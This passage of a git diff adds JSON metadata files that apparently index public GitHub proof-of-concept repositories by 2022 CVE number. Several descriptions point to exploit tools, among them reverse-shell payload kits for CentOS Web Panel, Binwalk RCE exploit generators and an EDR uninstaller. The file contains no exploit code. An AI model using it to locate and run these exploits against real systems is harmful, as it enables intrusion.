"2023-02-15T18:12:04Z", + "updated_at": "2024-12-16T20:11:41Z", + "pushed_at": "2023-06-18T21:10:39Z", + "stargazers_count": 154, + "watchers_count": 154, + "has_discussions": false, + "forks_count": 26, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 26, + "watchers": 154, + "score": 0, + "subscribers_count": 6 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-44721.json b/2022/CVE-2022-44721.json new file mode 100644 index 0000000000..f076fb525b --- /dev/null +++ b/2022/CVE-2022-44721.json @@ -0,0 +1,33 @@ +[ + { + "id": 573763384, + "name": "CVE-2022-44721-CsFalconUninstaller", + "full_name": "gmh5225\/CVE-2022-44721-CsFalconUninstaller", + "owner": { + "login": "gmh5225", + "id": 13917777, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13917777?v=4", + "html_url": "https:\/\/github.com\/gmh5225", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gmh5225\/CVE-2022-44721-CsFalconUninstaller", + "description": null, + "fork": false, + "created_at": "2022-12-03T11:04:17Z", + "updated_at": "2024-11-07T05:28:12Z", + "pushed_at": "2022-12-02T14:38:27Z", + "stargazers_count": 23, + "watchers_count": 23, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 23, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-44789.json b/2022/CVE-2022-44789.json new file mode 100644 index 0000000000..e48a3087e8 --- /dev/null +++ b/2022/CVE-2022-44789.json @@ -0,0 +1,33 @@ +[ + { + "id": 569477631, + "name": "CVE-2022-44789", + "full_name": "alalng\/CVE-2022-44789", + "owner": { + "login": "alalng", + "id": 61508435, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61508435?v=4", + "html_url": "https:\/\/github.com\/alalng", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/alalng\/CVE-2022-44789", + "description": null, + "fork": false, + "created_at": "2022-11-22T23:11:08Z", + "updated_at": "2023-12-11T06:17:46Z", + "pushed_at": "2023-01-28T10:31:02Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 12, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-44830.json b/2022/CVE-2022-44830.json new file mode 100644 index 0000000000..8a337a1d90 --- /dev/null +++ b/2022/CVE-2022-44830.json @@ -0,0 +1,33 @@ +[ + { + "id": 568387723, + "name": "CVE-2022-44830", + "full_name": "RashidKhanPathan\/CVE-2022-44830", + "owner": { + "login": "RashidKhanPathan", + "id": 65374016, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65374016?v=4", + "html_url": "https:\/\/github.com\/RashidKhanPathan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RashidKhanPathan\/CVE-2022-44830", + "description": null, + "fork": false, + "created_at": "2022-11-20T11:35:05Z", + "updated_at": "2024-12-19T15:23:21Z", + "pushed_at": "2022-11-20T11:35:54Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-44870.json b/2022/CVE-2022-44870.json new file mode 100644 index 0000000000..384bc96383 --- /dev/null +++ b/2022/CVE-2022-44870.json @@ -0,0 +1,33 @@ +[ + { + "id": 580610277, + "name": "CVE-2022-44870", + "full_name": "Cedric1314\/CVE-2022-44870", + "owner": { + "login": "Cedric1314", + "id": 42855430, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42855430?v=4", + "html_url": "https:\/\/github.com\/Cedric1314", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Cedric1314\/CVE-2022-44870", + "description": "maccms admin+ xss attacks ", + "fork": false, + "created_at": "2022-12-21T01:40:11Z", + "updated_at": "2023-01-24T20:36:42Z", + "pushed_at": "2023-01-03T07:43:45Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-44875.json b/2022/CVE-2022-44875.json new file mode 100644 index 0000000000..cd57e6a348 --- /dev/null +++ b/2022/CVE-2022-44875.json @@ -0,0 +1,33 @@ +[ + { + "id": 668761323, + "name": "CVE-2022-44875-Test", + "full_name": "AesirSec\/CVE-2022-44875-Test", + "owner": { + "login": "AesirSec", + "id": 62112812, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62112812?v=4", + "html_url": "https:\/\/github.com\/AesirSec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AesirSec\/CVE-2022-44875-Test", + "description": "Testing CVE-2022-44875", + "fork": false, + "created_at": "2023-07-20T14:30:58Z", + "updated_at": "2024-05-06T20:50:03Z", + "pushed_at": "2023-07-26T00:27:36Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-44877.json b/2022/CVE-2022-44877.json new file mode 100644 index 0000000000..dd05db3893 --- /dev/null +++ b/2022/CVE-2022-44877.json @@ -0,0 +1,286 @@ +[ + { + "id": 585639540, + "name": "CVE-2022-44877", + "full_name": "numanturle\/CVE-2022-44877", + "owner": { + "login": "numanturle", + "id": 7007951, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7007951?v=4", + "html_url": "https:\/\/github.com\/numanturle", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/numanturle\/CVE-2022-44877", + "description": null, + "fork": false, + "created_at": "2023-01-05T17:29:10Z", + "updated_at": "2024-12-18T07:27:21Z", + "pushed_at": "2023-01-05T17:40:18Z", + "stargazers_count": 103, + "watchers_count": 103, + "has_discussions": false, + "forks_count": 23, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 23, + "watchers": 103, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 585996269, + "name": "CVE-2022-44877-RCE", + "full_name": "komomon\/CVE-2022-44877-RCE", + "owner": { + "login": "komomon", + "id": 52700174, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52700174?v=4", + "html_url": "https:\/\/github.com\/komomon", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/komomon\/CVE-2022-44877-RCE", + "description": "CVE-2022-44877 Centos Web Panel 7 Unauthenticated Remote Code Execution", + "fork": false, + "created_at": "2023-01-06T16:53:51Z", + "updated_at": "2023-12-21T10:22:09Z", + "pushed_at": "2023-01-06T17:00:09Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 9, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 596515870, + "name": "CVE-2022-44877-CWP7", + "full_name": "ColdFusionX\/CVE-2022-44877-CWP7", + "owner": { + "login": "ColdFusionX", + "id": 8522240, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8522240?v=4", + "html_url": "https:\/\/github.com\/ColdFusionX", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ColdFusionX\/CVE-2022-44877-CWP7", + "description": "Control Web Panel 7 (CWP7) Remote Code Execution (RCE) (CVE-2022-44877) (Unauthenticated)", + "fork": false, + "created_at": "2023-02-02T11:00:32Z", + "updated_at": "2023-02-08T03:17:49Z", + "pushed_at": "2023-02-02T11:01:51Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 600549630, + "name": "CVE-2022-44877", + "full_name": "Chocapikk\/CVE-2022-44877", + "owner": { + "login": "Chocapikk", + "id": 88535377, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88535377?v=4", + "html_url": "https:\/\/github.com\/Chocapikk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Chocapikk\/CVE-2022-44877", + "description": "Bash Script for Checking Command Injection Vulnerability on CentOS Web Panel [CWP] (CVE-2022-44877)", + "fork": false, + "created_at": "2023-02-11T20:45:08Z", + "updated_at": "2024-08-12T20:29:46Z", + "pushed_at": "2023-02-11T22:03:19Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 602139288, + "name": "CVE-2022-44877-white-box", + "full_name": "hotpotcookie\/CVE-2022-44877-white-box", + "owner": { + "login": "hotpotcookie", + "id": 68333318, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68333318?v=4", + "html_url": "https:\/\/github.com\/hotpotcookie", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hotpotcookie\/CVE-2022-44877-white-box", + "description": "Red Team utilities for setting up CWP CentOS 7 payload & reverse shell (Red Team 9 - CW2023)", + "fork": false, + "created_at": "2023-02-15T15:22:48Z", + "updated_at": "2024-04-28T06:08:43Z", + "pushed_at": "2023-09-06T11:54:19Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-44877", + "cwp", + "os-command-injection", + "pentesting" + ], + "visibility": "public", + "forks": 0, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 609469987, + "name": "CVE-2022-44877-LAB", + "full_name": "RicYaben\/CVE-2022-44877-LAB", + "owner": { + "login": "RicYaben", + "id": 32867697, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32867697?v=4", + "html_url": "https:\/\/github.com\/RicYaben", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RicYaben\/CVE-2022-44877-LAB", + "description": null, + "fork": false, + "created_at": "2023-03-04T09:15:46Z", + "updated_at": "2023-03-11T20:49:36Z", + "pushed_at": "2023-03-13T08:32:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 619926011, + "name": "CVE-2022-44877", + "full_name": "dkstar11q\/CVE-2022-44877", + "owner": { + "login": "dkstar11q", + "id": 123830677, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/123830677?v=4", + "html_url": "https:\/\/github.com\/dkstar11q", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dkstar11q\/CVE-2022-44877", + "description": "Bash Script for Checking Command Injection Vulnerability on CentOS Web Panel [CWP] (CVE-2022-44877)", + "fork": false, + "created_at": "2023-03-27T17:27:19Z", + "updated_at": "2023-02-13T09:30:39Z", + "pushed_at": "2023-02-11T22:03:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 720567207, + "name": "CVE-2022-44877-RCE", + "full_name": "rhymsc\/CVE-2022-44877-RCE", + "owner": { + "login": "rhymsc", + "id": 104529423, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/104529423?v=4", + "html_url": "https:\/\/github.com\/rhymsc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rhymsc\/CVE-2022-44877-RCE", + "description": null, + "fork": false, + "created_at": "2023-11-18T21:53:54Z", + "updated_at": "2023-11-18T21:56:49Z", + "pushed_at": "2023-11-18T21:56:22Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 764149155, + "name": "CVE-2022-44877", + "full_name": "G01d3nW01f\/CVE-2022-44877", + "owner": { + "login": "G01d3nW01f", + "id": 75846902, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75846902?v=4", + "html_url": "https:\/\/github.com\/G01d3nW01f", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/G01d3nW01f\/CVE-2022-44877", + "description": null, + "fork": false, + "created_at": "2024-02-27T15:09:50Z", + "updated_at": "2024-02-27T15:10:39Z", + "pushed_at": "2024-02-28T00:57:14Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-44900.json b/2022/CVE-2022-44900.json new file mode 100644 index 0000000000..62ef4631f3 --- /dev/null +++ b/2022/CVE-2022-44900.json @@ -0,0 +1,33 @@ +[ + { + "id": 591689085, + "name": "CVE-2022-44900-demo-lab", + "full_name": "0xless\/CVE-2022-44900-demo-lab", + "owner": { + "login": "0xless", + "id": 78535423, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78535423?v=4", + "html_url": "https:\/\/github.com\/0xless", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xless\/CVE-2022-44900-demo-lab", + "description": "Demo webapp vulnerable to CVE-2022-44900", + "fork": false, + "created_at": "2023-01-21T14:52:59Z", + "updated_at": "2023-01-29T19:40:29Z", + "pushed_at": "2023-06-21T07:02:31Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-45003.json b/2022/CVE-2022-45003.json new file mode 100644 index 0000000000..4bb9831d94 --- /dev/null +++ b/2022/CVE-2022-45003.json @@ -0,0 +1,33 @@ +[ + { + "id": 620455544, + "name": "CVE-2022-45003", + "full_name": "mha98\/CVE-2022-45003", + "owner": { + "login": "mha98", + "id": 129213216, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/129213216?v=4", + "html_url": "https:\/\/github.com\/mha98", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mha98\/CVE-2022-45003", + "description": null, + "fork": false, + "created_at": "2023-03-28T18:04:17Z", + "updated_at": "2023-03-28T18:04:17Z", + "pushed_at": "2023-03-28T18:05:03Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-45004.json b/2022/CVE-2022-45004.json new file mode 100644 index 0000000000..235362b410 --- /dev/null +++ b/2022/CVE-2022-45004.json @@ -0,0 +1,33 @@ +[ + { + "id": 620449786, + "name": "CVE-2022-45004", + "full_name": "mha98\/CVE-2022-45004", + "owner": { + "login": "mha98", + "id": 129213216, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/129213216?v=4", + "html_url": "https:\/\/github.com\/mha98", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mha98\/CVE-2022-45004", + "description": null, + "fork": false, + "created_at": "2023-03-28T17:49:59Z", + "updated_at": "2023-03-28T17:49:59Z", + "pushed_at": "2023-03-28T18:03:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-45025.json b/2022/CVE-2022-45025.json new file mode 100644 index 0000000000..4a8823574c --- /dev/null +++ b/2022/CVE-2022-45025.json @@ -0,0 +1,70 @@ +[ + { + "id": 576453158, + "name": "CVE-2022-45025", + "full_name": "yuriisanin\/CVE-2022-45025", + "owner": { + "login": "yuriisanin", + "id": 11749007, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11749007?v=4", + "html_url": "https:\/\/github.com\/yuriisanin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yuriisanin\/CVE-2022-45025", + "description": "[PoC] Command injection via PDF import in Markdown Preview Enhanced (VSCode, Atom)", + "fork": false, + "created_at": "2022-12-09T22:48:38Z", + "updated_at": "2024-11-11T01:49:48Z", + "pushed_at": "2022-12-11T13:37:22Z", + "stargazers_count": 89, + "watchers_count": 89, + "has_discussions": false, + "forks_count": 20, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "command-injection", + "cve", + "exploit", + "markdown", + "rce" + ], + "visibility": "public", + "forks": 20, + "watchers": 89, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 652218279, + "name": "CVE-2022-45025", + "full_name": "andyhsu024\/CVE-2022-45025", + "owner": { + "login": "andyhsu024", + "id": 131547485, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/131547485?v=4", + "html_url": "https:\/\/github.com\/andyhsu024", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/andyhsu024\/CVE-2022-45025", + "description": null, + "fork": false, + "created_at": "2023-06-11T13:18:12Z", + "updated_at": "2023-06-11T13:18:12Z", + "pushed_at": "2023-06-11T13:18:12Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-45047.json b/2022/CVE-2022-45047.json new file mode 100644 index 0000000000..359e7c260d --- /dev/null +++ b/2022/CVE-2022-45047.json @@ -0,0 +1,33 @@ +[ + { + "id": 624692526, + "name": "CVE-2022-45047", + "full_name": "hktalent\/CVE-2022-45047", + "owner": { + "login": "hktalent", + "id": 18223385, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18223385?v=4", + "html_url": "https:\/\/github.com\/hktalent", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hktalent\/CVE-2022-45047", + "description": "POC,EXP,chatGPT for me", + "fork": false, + "created_at": "2023-04-07T03:16:47Z", + "updated_at": "2023-04-07T03:25:11Z", + "pushed_at": "2023-04-07T03:17:10Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-45059.json b/2022/CVE-2022-45059.json new file mode 100644 index 0000000000..579d65e7fa --- /dev/null +++ b/2022/CVE-2022-45059.json @@ -0,0 +1,33 @@ +[ + { + "id": 717712143, + "name": "CVE-2022-45059-demo", + "full_name": "martinvks\/CVE-2022-45059-demo", + "owner": { + "login": "martinvks", + "id": 5469666, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5469666?v=4", + "html_url": "https:\/\/github.com\/martinvks", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/martinvks\/CVE-2022-45059-demo", + "description": null, + "fork": false, + "created_at": "2023-11-12T10:51:54Z", + "updated_at": "2023-11-14T08:03:46Z", + "pushed_at": "2023-11-14T08:04:54Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-4510.json b/2022/CVE-2022-4510.json new file mode 100644 index 0000000000..f0ef23b57b --- /dev/null +++ b/2022/CVE-2022-4510.json @@ -0,0 +1,95 @@ +[ + { + "id": 598309338, + "name": "CVE-2022-4510", + "full_name": "electr0sm0g\/CVE-2022-4510", + "owner": { + "login": "electr0sm0g", + "id": 8340491, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8340491?v=4", + "html_url": "https:\/\/github.com\/electr0sm0g", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/electr0sm0g\/CVE-2022-4510", + "description": "Binwalk Remote Command Execution", + "fork": false, + "created_at": "2023-02-06T20:53:49Z", + "updated_at": "2024-11-17T01:33:08Z", + "pushed_at": "2023-02-06T20:54:33Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 659028420, + "name": "CVE-2022-4510-WalkingPath", + "full_name": "adhikara13\/CVE-2022-4510-WalkingPath", + "owner": { + "login": "adhikara13", + "id": 44716348, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44716348?v=4", + "html_url": "https:\/\/github.com\/adhikara13", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/adhikara13\/CVE-2022-4510-WalkingPath", + "description": "A Python script for generating exploits targeting CVE-2022-4510 RCE Binwalk. It supports SSH, command execution, and reverse shell options. Exploits are saved in PNG format. Ideal for testing and demonstrations.", + "fork": false, + "created_at": "2023-06-27T02:20:13Z", + "updated_at": "2024-11-22T19:48:06Z", + "pushed_at": "2023-06-27T02:29:26Z", + "stargazers_count": 14, + "watchers_count": 14, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 14, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 665275498, + "name": "BadPfs-CVE-2022-4510", + "full_name": "Kalagious\/BadPfs-CVE-2022-4510", + "owner": { + "login": "Kalagious", + "id": 44515549, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44515549?v=4", + "html_url": "https:\/\/github.com\/Kalagious", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Kalagious\/BadPfs-CVE-2022-4510", + "description": "Python script that generates pfs payloads to exploit CVE-2022-4510", + "fork": false, + "created_at": "2023-07-11T20:55:58Z", + "updated_at": "2024-06-08T19:59:42Z", + "pushed_at": "2023-07-11T20:59:48Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-45217.json b/2022/CVE-2022-45217.json new file mode 100644 index 0000000000..4c6dd62d3b --- /dev/null +++ b/2022/CVE-2022-45217.json @@ -0,0 +1,33 @@ +[ + { + "id": 572052836, + "name": "CVE-2022-45217", + "full_name": "sudoninja-noob\/CVE-2022-45217", + "owner": { + "login": "sudoninja-noob", + "id": 18701598, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18701598?v=4", + "html_url": "https:\/\/github.com\/sudoninja-noob", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sudoninja-noob\/CVE-2022-45217", + "description": null, + "fork": false, + "created_at": "2022-11-29T13:05:14Z", + "updated_at": "2022-11-30T06:11:34Z", + "pushed_at": "2022-11-29T13:05:41Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-45265.json b/2022/CVE-2022-45265.json new file mode 100644 index 0000000000..88e77a0e15 --- /dev/null +++ b/2022/CVE-2022-45265.json @@ -0,0 +1,33 @@ +[ + { + "id": 563364347, + "name": "CVE-2022-45265", + "full_name": "maikroservice\/CVE-2022-45265", + "owner": { + "login": "maikroservice", + "id": 20245897, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20245897?v=4", + "html_url": "https:\/\/github.com\/maikroservice", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/maikroservice\/CVE-2022-45265", + "description": null, + "fork": false, + "created_at": "2022-11-08T13:13:25Z", + "updated_at": "2022-12-08T22:01:14Z", + "pushed_at": "2022-12-08T22:00:31Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-45299.json b/2022/CVE-2022-45299.json new file mode 100644 index 0000000000..7bd9f70d17 --- /dev/null +++ b/2022/CVE-2022-45299.json @@ -0,0 +1,33 @@ +[ + { + "id": 588548677, + "name": "CVE-2022-45299", + "full_name": "offalltn\/CVE-2022-45299", + "owner": { + "login": "offalltn", + "id": 110370549, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/110370549?v=4", + "html_url": "https:\/\/github.com\/offalltn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/offalltn\/CVE-2022-45299", + "description": "CVE 2022-45299", + "fork": false, + "created_at": "2023-01-13T11:47:02Z", + "updated_at": "2023-05-24T12:30:02Z", + "pushed_at": "2023-01-13T12:01:29Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-45354.json b/2022/CVE-2022-45354.json new file mode 100644 index 0000000000..89dd46e83a --- /dev/null +++ b/2022/CVE-2022-45354.json @@ -0,0 +1,33 @@ +[ + { + "id": 665038717, + "name": "CVE-2022-45354", + "full_name": "RandomRobbieBF\/CVE-2022-45354", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2022-45354", + "description": "Download Monitor <= 4.7.60 - Sensitive Information Exposure via REST API ", + "fork": false, + "created_at": "2023-07-11T09:51:40Z", + "updated_at": "2024-08-12T20:32:05Z", + "pushed_at": "2023-07-11T10:14:10Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-4539.json b/2022/CVE-2022-4539.json new file mode 100644 index 0000000000..21d25114e5 --- /dev/null +++ b/2022/CVE-2022-4539.json @@ -0,0 +1,33 @@ +[ + { + "id": 850688674, + "name": "CVE-2022-4539", + "full_name": "Abdurahmon3236\/CVE-2022-4539", + "owner": { + "login": "Abdurahmon3236", + "id": 76862934, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76862934?v=4", + "html_url": "https:\/\/github.com\/Abdurahmon3236", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Abdurahmon3236\/CVE-2022-4539", + "description": null, + "fork": false, + "created_at": "2024-09-01T13:59:21Z", + "updated_at": "2024-09-01T13:59:38Z", + "pushed_at": "2024-09-01T13:59:36Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-4543.json b/2022/CVE-2022-4543.json new file mode 100644 index 0000000000..67b2b52743 --- /dev/null +++ b/2022/CVE-2022-4543.json @@ -0,0 +1,33 @@ +[ + { + "id": 664453374, + "name": "cve-2022-4543-wrapper", + "full_name": "sunichi\/cve-2022-4543-wrapper", + "owner": { + "login": "sunichi", + "id": 14269425, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14269425?v=4", + "html_url": "https:\/\/github.com\/sunichi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sunichi\/cve-2022-4543-wrapper", + "description": null, + "fork": false, + "created_at": 